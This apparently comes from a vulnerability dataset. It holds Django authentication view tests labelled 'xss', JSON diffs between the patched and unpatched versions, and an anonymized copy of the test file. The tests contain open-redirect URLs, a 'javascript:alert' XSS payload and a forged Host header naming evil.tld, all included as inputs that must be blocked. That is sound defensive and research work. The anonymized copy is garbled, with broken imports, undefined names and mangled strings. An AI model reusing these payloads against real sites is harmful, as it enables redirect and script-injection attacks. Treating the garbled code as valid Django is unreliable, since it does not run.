self.assertFormError(response, PasswordChangeForm.error_messages['password_incorrect'])
def test_password_change_fails_with_mismatched_passwords(self):
self.login()
response = self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'donuts',
})
self.assertFormError(response, SetPasswordForm.error_messages['password_mismatch'])
def test_password_change_succeeds(self):
self.login()
self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.fail_login()
self.login(password='password1')
def test_password_change_done_succeeds(self):
self.login()
response = self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/password_change/done/')
@override_settings(LOGIN_URL='/login/')
def test_password_change_done_fails(self):
response = self.client.get('/password_change/done/')
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/login/?next=/password_change/done/')
def test_password_change_redirect_default(self):
self.login()
response = self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/password_change/done/')
def test_password_change_redirect_custom(self):
self.login()
response = self.client.post('/password_change/custom/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/custom/')
def test_password_change_redirect_custom_named(self):
self.login()
response = self.client.post('/password_change/custom/named/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/password_reset/')
@skipIfCustomUser
class LoginTest(AuthViewsTestCase):
def test_current_site_in_context_after_login(self):
response = self.client.get(reverse('login'))
self.assertEqual(response.status_code, 200)
if Site._meta.installed:
site = Site.objects.get_current()
self.assertEqual(response.context['site'], site)
self.assertEqual(response.context['site_name'], site.name)
else:
self.assertIsInstance(response.context['site'], RequestSite)
self.assertTrue(isinstance(response.context['form'], AuthenticationForm),
'Login form is not an AuthenticationForm')
def test_security_check(self, password='password'):
login_url = reverse('login')
# Those URLs should not pass the security check
for bad_url in ('http://example.com',
'https://example.com',
'ftp://exampel.com',
'//example.com',
'javascript:alert("XSS")'):
nasty_url = '%(url)s?%(next)s=%(bad_url)s' % {
'url': login_url,
'next': REDIRECT_FIELD_NAME,
'bad_url': urlquote(bad_url),
}
response = self.client.post(nasty_url, {
'username': 'testclient',
'password': password,
})
self.assertEqual(response.status_code, 302)
self.assertFalse(bad_url in response.url,
"%s should be blocked" % bad_url)
# These URLs *should* still pass the security check
for good_url in ('/view/?param=http://example.com',
'/view/?param=https://example.com',
'/view?param=ftp://exampel.com',
'view/?param=//example.com',
'https:///',
'HTTPS:///',
'//testserver/',
'/url%20with%20spaces/'): # see ticket #12534
safe_url = '%(url)s?%(next)s=%(good_url)s' % {
'url': login_url,
'next': REDIRECT_FIELD_NAME,
'good_url': urlquote(good_url),
}
response = self.client.post(safe_url, {
'username': 'testclient',
'password': password,
})
self.assertEqual(response.status_code, 302)
self.assertTrue(good_url in response.url,
"%s should be allowed" % good_url)
def test_login_form_contains_request(self):
# 15198
self.client.post('/custom_requestauth_login/', {
'username': 'testclient',
'password': 'password',
}, follow=True)
# the custom authentication form used by this login asserts
# that a request is passed to the form successfully.
def test_login_csrf_rotate(self, password='password'):
"""
Makes sure that a login rotates the currently-used CSRF token.
"""
# Do a GET to establish a CSRF token
# TestClient isn't used here as we're testing middleware, essentially.
req = HttpRequest()
CsrfViewMiddleware().process_view(req, login_view, (), {})
req.META["CSRF_COOKIE_USED"] = True
resp = login_view(req)
resp2 = CsrfViewMiddleware().process_response(req, resp)
csrf_cookie = resp2.cookies.get(settings.CSRF_COOKIE_NAME, None)
token1 = csrf_cookie.coded_value
# Prepare the POST request
req = HttpRequest()
req.COOKIES[settings.CSRF_COOKIE_NAME] = token1
req.method = "POST"
req.POST = {'username': 'testclient', 'password': password, 'csrfmiddlewaretoken': token1}
req.REQUEST = req.POST
# Use POST request to log in
SessionMiddleware().process_request(req)
CsrfViewMiddleware().process_view(req, login_view, (), {})
req.META["SERVER_NAME"] = "testserver" # Required to have redirect work in login view
req.META["SERVER_PORT"] = 80
req.META["CSRF_COOKIE_USED"] = True
resp = login_view(req)
resp2 = CsrfViewMiddleware().process_response(req, resp)
csrf_cookie = resp2.cookies.get(settings.CSRF_COOKIE_NAME, None)
token2 = csrf_cookie.coded_value
# Check the CSRF token switched
self.assertNotEqual(token1, token2)
@skipIfCustomUser
class LoginURLSettings(AuthViewsTestCase):
"""Tests for settings.LOGIN_URL."""
def assertLoginURLEquals(self, url, parse_qs=False):
response = self.client.get('/login_required/')
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, url, parse_qs=parse_qs)
@override_settings(LOGIN_URL='/login/')
def test_standard_login_url(self):
self.assertLoginURLEquals('/login/?next=/login_required/')
@override_settings(LOGIN_URL='login')
def test_named_login_url(self):
self.assertLoginURLEquals('/login/?next=/login_required/')
@override_settings(LOGIN_URL='http://remote.example.com/login')
def test_remote_login_url(self):
quoted_next = urlquote('http://testserver/login_required/')
expected = 'http://remote.example.com/login?next=%s' % quoted_next
self.assertLoginURLEquals(expected)
@override_settings(LOGIN_URL='https:///login/')
def test_https_login_url(self):
quoted_next = urlquote('http://testserver/login_required/')
expected = 'https:///login/?next=%s' % quoted_next
self.assertLoginURLEquals(expected)
@override_settings(LOGIN_URL='/login/?pretty=1')
def test_login_url_with_querystring(self):
self.assertLoginURLEquals('/login/?pretty=1&next=/login_required/', parse_qs=True)
@override_settings(LOGIN_URL='http://remote.example.com/login/?next=/default/')
def test_remote_login_url_with_next_querystring(self):
quoted_next = urlquote('http://testserver/login_required/')
expected = 'http://remote.example.com/login/?next=%s' % quoted_next
self.assertLoginURLEquals(expected)
@skipIfCustomUser
class LoginRedirectUrlTest(AuthViewsTestCase):
"""Tests for settings.LOGIN_REDIRECT_URL."""
def assertLoginRedirectURLEqual(self, url):
response = self.login()
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, url)
def test_default(self):
self.assertLoginRedirectURLEqual('/accounts/profile/')
@override_settings(LOGIN_REDIRECT_URL='/custom/')
def test_custom(self):
self.assertLoginRedirectURLEqual('/custom/')
@override_settings(LOGIN_REDIRECT_URL='password_reset')
def test_named(self):
self.assertLoginRedirectURLEqual('/password_reset/')
@override_settings(LOGIN_REDIRECT_URL='http://remote.example.com/welcome/')
def test_remote(self):
self.assertLoginRedirectURLEqual('http://remote.example.com/welcome/')
@skipIfCustomUser
class LogoutTest(AuthViewsTestCase):
def confirm_logged_out(self):
self.assertTrue(SESSION_KEY not in self.client.session)
def test_logout_default(self):
"Logout without next_page option renders the default template"
self.login()
response = self.client.get('/logout/')
self.assertContains(response, 'Logged out')
self.confirm_logged_out()
def test_14377(self):
# Bug 14377
self.login()
response = self.client.get('/logout/')
self.assertTrue('site' in response.context)
def test_logout_with_overridden_redirect_url(self):
# Bug 11223
self.login()
response = self.client.get('/logout/next_page/')
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/somewhere/')
response = self.client.get('/logout/next_page/?next=/login/')
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/login/')
self.confirm_logged_out()
def test_logout_with_next_page_specified(self):
"Logout with next_page option given redirects to specified resource"
self.login()
response = self.client.get('/logout/next_page/')
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/somewhere/')
self.confirm_logged_out()
def test_logout_with_redirect_argument(self):
"Logout with query string redirects to specified resource"
self.login()
response = self.client.get('/logout/?next=/login/')
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/login/')
self.confirm_logged_out()
def test_logout_with_custom_redirect_argument(self):
"Logout with custom query string redirects to specified resource"
self.login()
response = self.client.get('/logout/custom_query/?follow=/somewhere/')
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/somewhere/')
self.confirm_logged_out()
def test_logout_with_named_redirect(self):
"Logout resolves names or URLs passed as next_page."
self.login()
response = self.client.get('/logout/next_page/named/')
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/password_reset/')
self.confirm_logged_out()
def test_security_check(self, password='password'):
logout_url = reverse('logout')
# Those URLs should not pass the security check
for bad_url in ('http://example.com',
'https://example.com',
'ftp://exampel.com',
'//example.com',
'javascript:alert("XSS")'):
nasty_url = '%(url)s?%(next)s=%(bad_url)s' % {
'url': logout_url,
'next': REDIRECT_FIELD_NAME,
'bad_url': urlquote(bad_url),
}
self.login()
response = self.client.get(nasty_url)
self.assertEqual(response.status_code, 302)
self.assertFalse(bad_url in response.url,
"%s should be blocked" % bad_url)
self.confirm_logged_out()
# These URLs *should* still pass the security check
for good_url in ('/view/?param=http://example.com',
'/view/?param=https://example.com',
'/view?param=ftp://exampel.com',
'view/?param=//example.com',
'https:///',
'HTTPS:///',
'//testserver/',
'/url%20with%20spaces/'): # see ticket #12534
safe_url = '%(url)s?%(next)s=%(good_url)s' % {
'url': logout_url,
'next': REDIRECT_FIELD_NAME,
'good_url': urlquote(good_url),
}
self.login()
response = self.client.get(safe_url)
self.assertEqual(response.status_code, 302)
self.assertTrue(good_url in response.url,
"%s should be allowed" % good_url)
self.confirm_logged_out()
@skipIfCustomUser
@override_settings(
PASSWORD_HASHERS=('django.contrib.auth.hashers.SHA1PasswordHasher',),
)
class ChangelistTests(AuthViewsTestCase):
urls = 'django.contrib.auth.tests.urls_admin'
def setUp(self):
# Make me a superuser before logging in.
User.objects.filter(username='testclient').update(is_staff=True, is_superuser=True)
self.login()
self.admin = User.objects.get(pk=1)
def get_user_data(self, user):
return {
'username': user.username,
'password': user.password,
'email': user.email,
'is_active': user.is_active,
'is_staff': user.is_staff,
'is_superuser': user.is_superuser,
'last_login_0': user.last_login.strftime('%Y-%m-%d'),
'last_login_1': user.last_login.strftime('%H:%M:%S'),
'initial-last_login_0': user.last_login.strftime('%Y-%m-%d'),
'initial-last_login_1': user.last_login.strftime('%H:%M:%S'),
'date_joined_0': user.date_joined.strftime('%Y-%m-%d'),
'date_joined_1': user.date_joined.strftime('%H:%M:%S'),
'initial-date_joined_0': user.date_joined.strftime('%Y-%m-%d'),
'initial-date_joined_1': user.date_joined.strftime('%H:%M:%S'),
'first_name': user.first_name,
'last_name': user.last_name,
}
# #20078 - users shouldn't be allowed to guess password hashes via
# repeated password__startswith queries.
def test_changelist_disallows_password_lookups(self):
# A lookup that tries to filter on password isn't OK
with patch_logger('django.security.DisallowedModelAdminLookup', 'error') as logger_calls:
response = self.client.get('/admin/auth/user/?password__startswith=sha1$')
self.assertEqual(response.status_code, 400)
self.assertEqual(len(logger_calls), 1)
def test_user_change_email(self):
data = self.get_user_data(self.admin)
data['email'] = 'new_' + data['email']
response = self.client.post('/admin/auth/user/%s/' % self.admin.pk, data)
self.assertRedirects(response, '/admin/auth/user/')
row = LogEntry.objects.latest('id')
self.assertEqual(row.change_message, 'Changed email.')
def test_user_not_change(self):
response = self.client.post('/admin/auth/user/%s/' % self.admin.pk,
self.get_user_data(self.admin)
)
self.assertRedirects(response, '/admin/auth/user/')
row = LogEntry.objects.latest('id')
self.assertEqual(row.change_message, 'No fields changed.')
def test_user_change_password(self):
response = self.client.post('/admin/auth/user/%s/password/' % self.admin.pk, {
'password1': 'password1',
'password2': 'password1',
})
self.assertRedirects(response, '/admin/auth/user/%s/' % self.admin.pk)
row = LogEntry.objects.latest('id')
self.assertEqual(row.change_message, 'Changed password.')
self.logout()
self.login(password='password1')
| xss | {
"code": [
" '//example.com'):",
" '//example.com'):"
],
"line_no": [
449,
664
]
} | {
"code": [
" '//example.com',",
" 'HTTPS:///',",
" '//example.com',",
" 'javascript:alert(\"XSS\")'):",
" 'HTTPS:///',"
],
"line_no": [
449,
471,
666,
667,
686
]
} | import itertools
import os
import re
try:
from urllib.parse import .urlparse, ParseResult
except ImportError: # Python 2
from urlparse import .urlparse, ParseResult
from django.conf import global_settings, VAR_23
from django.contrib.sites.models import Site, RequestSite
from django.contrib.admin.models import LogEntry
from django.contrib.auth.models import User
from django.core import mail
from django.core.urlresolvers import reverse, NoReverseMatch
from django.http import QueryDict, HttpRequest
from django.utils.encoding import force_text
from django.utils.http import .urlquote
from django.utils._os import .upath
from django.test import TestCase
from django.test.utils import override_settings, patch_logger
from django.middleware.csrf import CsrfViewMiddleware
from django.contrib.sessions.middleware import SessionMiddleware
from django.contrib.auth import SESSION_KEY, REDIRECT_FIELD_NAME
from django.contrib.auth.forms import (AuthenticationForm, PasswordChangeForm,
SetPasswordForm)
from django.contrib.auth.tests.utils import skipIfCustomUser
from django.contrib.auth.views import .login as login_view
@override_settings(
LANGUAGES=(
('en', 'English'),
),
LANGUAGE_CODE='en',
TEMPLATE_LOADERS=global_settings.TEMPLATE_LOADERS,
TEMPLATE_DIRS=(
os.path.join(os.path.dirname(upath(__file__)), 'templates'),
),
USE_TZ=False,
PASSWORD_HASHERS=('django.contrib.auth.hashers.SHA1PasswordHasher',),
)
class CLASS_0(TestCase):
VAR_0 = ['authtestdata.json']
VAR_1 = 'django.contrib.auth.tests.urls'
def FUNC_0(self, VAR_2='password'):
VAR_3 = self.client.post('/FUNC_0/', {
'username': 'testclient',
'password': VAR_2,
})
self.assertTrue(SESSION_KEY in self.client.session)
return VAR_3
def FUNC_1(self):
VAR_3 = self.client.get('/admin/FUNC_1/')
self.assertEqual(VAR_3.status_code, 200)
self.assertTrue(SESSION_KEY not in self.client.session)
def FUNC_2(self, VAR_3, VAR_4):
VAR_10 = list(itertools.chain(*VAR_3.context['form'].errors.values()))
self.assertIn(force_text(VAR_4), VAR_10)
def FUNC_3(self, VAR_5, VAR_6, VAR_7=False):
VAR_11 = ParseResult._fields
for attr, VAR_32, VAR_33 in zip(VAR_11, urlparse(VAR_5), urlparse(VAR_6)):
if VAR_7 and attr == 'query':
VAR_32, VAR_33 = QueryDict(VAR_32), QueryDict(VAR_33)
if VAR_32 and VAR_33 and VAR_32 != VAR_33:
self.fail("%r != %r (%s doesn't match)" % (VAR_5, VAR_6, attr))
@skipIfCustomUser
class CLASS_1(CLASS_0):
VAR_1 = 'django.contrib.auth.urls'
VAR_12 = [
('login', [], {}),
('logout', [], {}),
('password_change', [], {}),
('password_change_done', [], {}),
('password_reset', [], {}),
('password_reset_done', [], {}),
('password_reset_confirm', [], {
'uidb64': 'aaaaaaa',
'token': '1111-aaaaa',
}),
('password_reset_complete', [], {}),
]
for name, args, kwargs in VAR_12:
try:
reverse(name, args=args, kwargs=kwargs)
except NoReverseMatch:
self.fail("Reversal of VAR_5 named '%s' failed with NoReverseMatch" % name)
@skipIfCustomUser
class CLASS_2(CLASS_0):
def FUNC_5(self):
VAR_3 = self.client.get('/password_reset/')
self.assertEqual(VAR_3.status_code, 200)
VAR_3 = self.client.post('/password_reset/', {'email': 'not_a_real_email@VAR_8.com'})
self.assertEqual(VAR_3.status_code, 302)
self.assertEqual(len(mail.outbox), 0)
VAR_3 = self.client.post('/password_reset/', {'email': 'staffmember@example.com'})
self.assertEqual(VAR_3.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
self.assertTrue("http://" in mail.outbox[0].body)
self.assertEqual(VAR_23.DEFAULT_FROM_EMAIL, mail.outbox[0].from_email)
self.assertFalse(mail.outbox[0].message().is_multipart())
def FUNC_7(self):
VAR_3 = self.client.post('/password_reset/html_email_template/', {'email': 'staffmember@example.com'})
self.assertEqual(VAR_3.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
VAR_13 = mail.outbox[0].message()
self.assertEqual(len(VAR_13.get_payload()), 2)
self.assertTrue(VAR_13.is_multipart())
self.assertEqual(VAR_13.get_payload(0).get_content_type(), 'text/plain')
self.assertEqual(VAR_13.get_payload(1).get_content_type(), 'text/html')
self.assertTrue('<html>' not in VAR_13.get_payload(0).get_payload())
self.assertTrue('<html>' in VAR_13.get_payload(1).get_payload())
VAR_3 = self.client.post('/password_reset_from_email/', {'email': 'staffmember@example.com'})
self.assertEqual(VAR_3.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual("staffmember@example.com", mail.outbox[0].from_email)
VAR_3 = self.client.post('/admin_password_reset/',
{'email': 'staffmember@example.com'},
HTTP_HOST='adminsite.com'
)
self.assertEqual(VAR_3.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
self.assertTrue("http://adminsite.com" in mail.outbox[0].body)
self.assertEqual(VAR_23.DEFAULT_FROM_EMAIL, mail.outbox[0].from_email)
with patch_logger('django.security.DisallowedHost', 'error') as logger_calls:
VAR_3 = self.client.post('/password_reset/',
{'email': 'staffmember@example.com'},
HTTP_HOST='www.example:dr.frankenstein@evil.tld'
)
self.assertEqual(VAR_3.status_code, 400)
self.assertEqual(len(mail.outbox), 0)
self.assertEqual(len(logger_calls), 1)
with patch_logger('django.security.DisallowedHost', 'error') as logger_calls:
VAR_3 = self.client.post('/admin_password_reset/',
{'email': 'staffmember@example.com'},
HTTP_HOST='www.example:dr.frankenstein@evil.tld'
)
self.assertEqual(VAR_3.status_code, 400)
self.assertEqual(len(mail.outbox), 0)
self.assertEqual(len(logger_calls), 1)
def FUNC_12(self):
self.client.post('/password_reset/', {'email': 'staffmember@example.com'})
self.assertEqual(len(mail.outbox), 1)
return self._read_signup_email(mail.outbox[0])
def FUNC_13(self, VAR_8):
VAR_14 = re.search(r"https?://[^/]*(/.*reset/\S*)", VAR_8.body)
self.assertTrue(VAR_14 is not None, "No URL found in sent email")
return VAR_14.group(), VAR_14.groups()[0]
def FUNC_14(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_3 = self.client.get(VAR_15)
self.assertContains(VAR_3, "Please enter your new password")
def FUNC_15(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_15 = path[:-5] + ("0" * 4) + VAR_15[-1]
VAR_3 = self.client.get(VAR_15)
self.assertContains(VAR_3, "The VAR_2 reset link was invalid")
def FUNC_16(self):
VAR_3 = self.client.get('/reset/123456/1-1/')
self.assertContains(VAR_3, "The VAR_2 reset link was invalid")
def FUNC_17(self):
VAR_3 = self.client.get('/reset/zzzzzzzzzzzzz/1-1/')
self.assertContains(VAR_3, "The VAR_2 reset link was invalid")
def FUNC_18(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_15 = path[:-5] + ("0" * 4) + VAR_15[-1]
self.client.post(VAR_15, {
'new_password1': 'anewpassword',
'new_password2': ' anewpassword',
})
VAR_16 = User.objects.get(VAR_8='staffmember@example.com')
self.assertTrue(not VAR_16.check_password("anewpassword"))
def FUNC_19(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_3 = self.client.post(VAR_15, {'new_password1': 'anewpassword',
'new_password2': 'anewpassword'})
VAR_16 = User.objects.get(VAR_8='staffmember@example.com')
self.assertTrue(VAR_16.check_password("anewpassword"))
VAR_3 = self.client.get(VAR_15)
self.assertContains(VAR_3, "The VAR_2 reset link was invalid")
def FUNC_20(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_3 = self.client.post(VAR_15, {'new_password1': 'anewpassword',
'new_password2': 'x'})
self.assertFormError(VAR_3, SetPasswordForm.error_messages['password_mismatch'])
def FUNC_21(self):
VAR_3 = self.client.post('/password_reset/',
{'email': 'staffmember@example.com'})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/password_reset/done/')
def FUNC_22(self):
VAR_3 = self.client.post('/password_reset/custom_redirect/',
{'email': 'staffmember@example.com'})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/custom/')
def FUNC_23(self):
VAR_3 = self.client.post('/password_reset/custom_redirect/named/',
{'email': 'staffmember@example.com'})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/password_reset/')
def FUNC_24(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_3 = self.client.post(VAR_15, {'new_password1': 'anewpassword',
'new_password2': 'anewpassword'})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/reset/done/')
def FUNC_25(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_15 = path.replace('/reset/', '/reset/custom/')
VAR_3 = self.client.post(VAR_15, {'new_password1': 'anewpassword',
'new_password2': 'anewpassword'})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/custom/')
def FUNC_26(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_15 = path.replace('/reset/', '/reset/custom/named/')
VAR_3 = self.client.post(VAR_15, {'new_password1': 'anewpassword',
'new_password2': 'anewpassword'})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/password_reset/')
@override_settings(AUTH_USER_MODEL='auth.CustomUser')
class CLASS_3(CLASS_0):
VAR_0 = ['custom_user.json']
def FUNC_12(self):
VAR_3 = self.client.post('/password_reset/', {'email': 'staffmember@example.com'})
self.assertEqual(VAR_3.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
return self._read_signup_email(mail.outbox[0])
def FUNC_13(self, VAR_8):
VAR_14 = re.search(r"https?://[^/]*(/.*reset/\S*)", VAR_8.body)
self.assertTrue(VAR_14 is not None, "No URL found in sent email")
return VAR_14.group(), VAR_14.groups()[0]
def FUNC_27(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_3 = self.client.get(VAR_15)
self.assertContains(VAR_3, "Please enter your new password")
@skipIfCustomUser
class CLASS_4(CLASS_0):
def FUNC_28(self, VAR_2='password'):
VAR_3 = self.client.post('/FUNC_0/', {
'username': 'testclient',
'password': VAR_2,
})
self.assertFormError(VAR_3, AuthenticationForm.error_messages['invalid_login'] % {
'username': User._meta.get_field('username').verbose_name
})
def FUNC_1(self):
self.client.get('/FUNC_1/')
def FUNC_29(self):
self.login()
VAR_3 = self.client.post('/password_change/', {
'old_password': 'donuts',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertFormError(VAR_3, PasswordChangeForm.error_messages['password_incorrect'])
def FUNC_30(self):
self.login()
VAR_3 = self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'donuts',
})
self.assertFormError(VAR_3, SetPasswordForm.error_messages['password_mismatch'])
def FUNC_31(self):
self.login()
self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.fail_login()
self.login(VAR_2='password1')
def FUNC_32(self):
self.login()
VAR_3 = self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/password_change/done/')
@override_settings(LOGIN_URL='/FUNC_0/')
def FUNC_33(self):
VAR_3 = self.client.get('/password_change/done/')
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/FUNC_0/?next=/password_change/done/')
def FUNC_34(self):
self.login()
VAR_3 = self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/password_change/done/')
def FUNC_35(self):
self.login()
VAR_3 = self.client.post('/password_change/custom/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/custom/')
def FUNC_36(self):
self.login()
VAR_3 = self.client.post('/password_change/custom/named/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/password_reset/')
@skipIfCustomUser
class CLASS_5(CLASS_0):
def FUNC_37(self):
VAR_3 = self.client.get(reverse('login'))
self.assertEqual(VAR_3.status_code, 200)
if Site._meta.installed:
VAR_29 = Site.objects.get_current()
self.assertEqual(VAR_3.context['site'], VAR_29)
self.assertEqual(VAR_3.context['site_name'], VAR_29.name)
else:
self.assertIsInstance(VAR_3.context['site'], RequestSite)
self.assertTrue(isinstance(VAR_3.context['form'], AuthenticationForm),
'Login form is not an AuthenticationForm')
def FUNC_38(self, VAR_2='password'):
VAR_17 = reverse('login')
for bad_url in ('http://example.com',
'https://example.com',
'ftp://exampel.com',
'//example.com'):
VAR_30 = '%(VAR_5)s?%(next)s=%(bad_url)s' % {
'url': VAR_17,
'next': REDIRECT_FIELD_NAME,
'bad_url': urlquote(bad_url),
}
VAR_3 = self.client.post(VAR_30, {
'username': 'testclient',
'password': VAR_2,
})
self.assertEqual(VAR_3.status_code, 302)
self.assertFalse(bad_url in VAR_3.url,
"%s should be blocked" % bad_url)
for good_url in ('/view/?param=http://example.com',
'/view/?param=https://example.com',
'/view?param=ftp://exampel.com',
'view/?param=//example.com',
'https:///',
'//testserver/',
'/VAR_5%20with%20spaces/'): # see ticket #12534
VAR_31 = '%(VAR_5)s?%(next)s=%(good_url)s' % {
'url': VAR_17,
'next': REDIRECT_FIELD_NAME,
'good_url': urlquote(good_url),
}
VAR_3 = self.client.post(VAR_31, {
'username': 'testclient',
'password': VAR_2,
})
self.assertEqual(VAR_3.status_code, 302)
self.assertTrue(good_url in VAR_3.url,
"%s should be allowed" % good_url)
def FUNC_39(self):
self.client.post('/custom_requestauth_login/', {
'username': 'testclient',
'password': 'password',
}, follow=True)
def FUNC_40(self, VAR_2='password'):
VAR_18 = HttpRequest()
CsrfViewMiddleware().process_view(VAR_18, login_view, (), {})
VAR_18.META["CSRF_COOKIE_USED"] = True
VAR_19 = login_view(VAR_18)
VAR_20 = CsrfViewMiddleware().process_response(VAR_18, VAR_19)
VAR_21 = VAR_20.cookies.get(VAR_23.CSRF_COOKIE_NAME, None)
VAR_22 = VAR_21.coded_value
VAR_18 = HttpRequest()
VAR_18.COOKIES[VAR_23.CSRF_COOKIE_NAME] = VAR_22
VAR_18.method = "POST"
VAR_18.POST = {'username': 'testclient', 'password': VAR_2, 'csrfmiddlewaretoken': VAR_22}
VAR_18.REQUEST = VAR_18.POST
SessionMiddleware().process_request(VAR_18)
CsrfViewMiddleware().process_view(VAR_18, login_view, (), {})
VAR_18.META["SERVER_NAME"] = "testserver" # Required to have redirect work in FUNC_0 view
VAR_18.META["SERVER_PORT"] = 80
VAR_18.META["CSRF_COOKIE_USED"] = True
VAR_19 = login_view(VAR_18)
VAR_20 = CsrfViewMiddleware().process_response(VAR_18, VAR_19)
VAR_21 = VAR_20.cookies.get(VAR_23.CSRF_COOKIE_NAME, None)
VAR_24 = VAR_21.coded_value
self.assertNotEqual(VAR_22, VAR_24)
@skipIfCustomUser
class CLASS_6(CLASS_0):
def FUNC_41(self, VAR_5, VAR_7=False):
VAR_3 = self.client.get('/login_required/')
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, VAR_5, VAR_7=parse_qs)
@override_settings(LOGIN_URL='/FUNC_0/')
def FUNC_42(self):
self.assertLoginURLEquals('/FUNC_0/?next=/login_required/')
@override_settings(LOGIN_URL='login')
def FUNC_43(self):
self.assertLoginURLEquals('/FUNC_0/?next=/login_required/')
@override_settings(LOGIN_URL='http://remote.example.com/login')
def FUNC_44(self):
VAR_25 = urlquote('http://testserver/login_required/')
VAR_6 = 'http://remote.example.com/FUNC_0?next=%s' % VAR_25
self.assertLoginURLEquals(VAR_6)
@override_settings(LOGIN_URL='https:///FUNC_0/')
def FUNC_45(self):
VAR_25 = urlquote('http://testserver/login_required/')
VAR_6 = 'https:///FUNC_0/?next=%s' % VAR_25
self.assertLoginURLEquals(VAR_6)
@override_settings(LOGIN_URL='/FUNC_0/?pretty=1')
def FUNC_46(self):
self.assertLoginURLEquals('/FUNC_0/?pretty=1&next=/login_required/', VAR_7=True)
@override_settings(LOGIN_URL='http://remote.example.com/FUNC_0/?next=/default/')
def FUNC_47(self):
VAR_25 = urlquote('http://testserver/login_required/')
VAR_6 = 'http://remote.example.com/FUNC_0/?next=%s' % VAR_25
self.assertLoginURLEquals(VAR_6)
@skipIfCustomUser
class CLASS_7(CLASS_0):
def FUNC_48(self, VAR_5):
VAR_3 = self.login()
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, VAR_5)
def FUNC_49(self):
self.assertLoginRedirectURLEqual('/accounts/profile/')
@override_settings(LOGIN_REDIRECT_URL='/custom/')
def FUNC_50(self):
self.assertLoginRedirectURLEqual('/custom/')
@override_settings(LOGIN_REDIRECT_URL='password_reset')
def FUNC_51(self):
self.assertLoginRedirectURLEqual('/password_reset/')
@override_settings(LOGIN_REDIRECT_URL='http://remote.example.com/welcome/')
def FUNC_52(self):
self.assertLoginRedirectURLEqual('http://remote.example.com/welcome/')
@skipIfCustomUser
class CLASS_8(CLASS_0):
def FUNC_53(self):
self.assertTrue(SESSION_KEY not in self.client.session)
self.login()
VAR_3 = self.client.get('/FUNC_1/')
self.assertContains(VAR_3, 'Logged out')
self.confirm_logged_out()
def FUNC_55(self):
self.login()
VAR_3 = self.client.get('/FUNC_1/')
self.assertTrue('site' in VAR_3.context)
def FUNC_56(self):
self.login()
VAR_3 = self.client.get('/FUNC_1/next_page/')
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/somewhere/')
VAR_3 = self.client.get('/FUNC_1/next_page/?next=/FUNC_0/')
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/FUNC_0/')
self.confirm_logged_out()
self.login()
VAR_3 = self.client.get('/FUNC_1/next_page/')
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/somewhere/')
self.confirm_logged_out()
self.login()
VAR_3 = self.client.get('/FUNC_1/?next=/FUNC_0/')
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/FUNC_0/')
